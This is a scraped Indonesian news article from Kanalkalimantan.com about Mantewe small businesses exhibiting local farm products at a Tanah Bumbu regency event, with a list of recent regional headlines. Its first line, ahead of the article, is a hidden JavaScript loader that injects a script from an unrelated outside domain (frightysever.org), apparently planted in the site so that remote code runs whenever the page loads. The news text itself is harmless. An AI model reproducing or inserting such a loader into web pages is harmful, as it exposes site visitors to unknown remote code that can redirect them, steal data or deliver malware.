(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

UMKM Mantewe Pamerkan Produk Olahan Unggulan Desa


KANALKALIMANTAN.COM, BATULICIN – Pemkab Tanbu mendorong daya guna pemenuhan kesejahteraan masyarakat, melalui berbagai bantuan dan fasilitas pengembangan UMKM.

UMKM Mantewe menjadi salah satu usaha masyarakat yang ikut berpartisipasi pada kegiatan pameran produk UMKM yang diselenggarakan Dinas Perpustakaan dan Kearsiapan (Dispersip) Kabupaten Tanah Bumbu (Tanbu), Kamis (4/8/2022).

Tingginya persaingan pasar global kini hingga terbilang semakin naiknya kebutuhan masyarakat, tetap tidak menyurutkan langkah dan semangat para pelaku usaha UMKM, dalam membangun ekonomi kreatif produktif dari berbagai ketekunan usaha dan keterampilan yang bisa diolah masyarakat di daerah.

Rina dari BPP (Badan Penyuluh Pertanian) Mantewe, fasilitator program YESS juga sebagai Ketua UMKM Mantewe, menyampaikan bahwa kegiatan pameran produk UMKM yang diselenggarakan Dispersip Tanbu berbasis inklusi sosial memberi kesempatan secara terbuka membuka peluang pengenalan produk-produk unggulan Mantewe.

 

 

Baca juga: Buntut Penembakan Brigadir J, Irjen Ferdy Sambo Dimutasi Bersama Anak Buahnya

“Dari Kecamatan Mantewe, membawa produk berbasis pertanian, melalui para pelaku usaha khususnya para peserta program YESS, yang telah menerima dana bantuan hibah kompetitif untuk pengembangan usahanya,” ujarnya.

Program YESS sendiri, merupakan program pengembangan kewirausahaan dan ketenagakerjaan di sektor pertanian, dari Kementerian Pertanian RI yang bekerjasama dengan Internasional Fund Agricultural Development. Dengan sasaran para pemuda milenial berusia 17-39 tahun.

Bupati Tanbu HM Zairullah Azhar tidak ingin melewatkan event pameran tersebut. Pada kesempatannya, Bupati Tanbu ditemani istri Hj Wahyu Windarti bersama Deputi Bidang Pengembangan Sumber Daya Perpustakaan Perpusnas RI Deni Kurniadi sempat singgah di stand UMKM Mantewe untuk menanyakan tentang produk apa saja yang telah dipamerkan.

Kali ini Bupati Zairullah langsung membeli berbagai jajanan kemasan alami, seperti minuman kemasan serbuk wedang jahe alami tanpa gula dan pengawet buatan, olahan buah pisang, kripik sukun, dan lainnya.

Ardiansyah, Kepala Diskominfo SP Tanbu mengungkapkan rasa bangga kepaa pelaku UMKM, terkhusus pada masyarakat Mantewe, dengan kreativitasnya dalam menciptakan produk-produk yang mampu membawa pertumbuhan ekonomi dan kesejahteraan masyarakat Mantewe semakin meningkat. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Risa

Recent Posts

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

8 menit ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

18 menit ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

22 menit ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

3 jam ago

Atraksi Ritual Laluhan Warnai Hari Jadi ke-218 Kota Kuala Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Atraksi budaya ritual Laluhan Suku Dayak Ngaju ditampilkan memeriahkan Hari Jadi… Read More

10 jam ago

Dear Pencari Kerja: Ratusan Lowongan Kerja Tersedia di Banjarbaru Job Fair 2024

KANALKALIMANTAN.COM, BANJARBARU - Para pencari kerja di Ibu Kota Provinsi Kalimantan Selatan diminta untuk mempersiapkan… Read More

13 jam ago

This website uses cookies.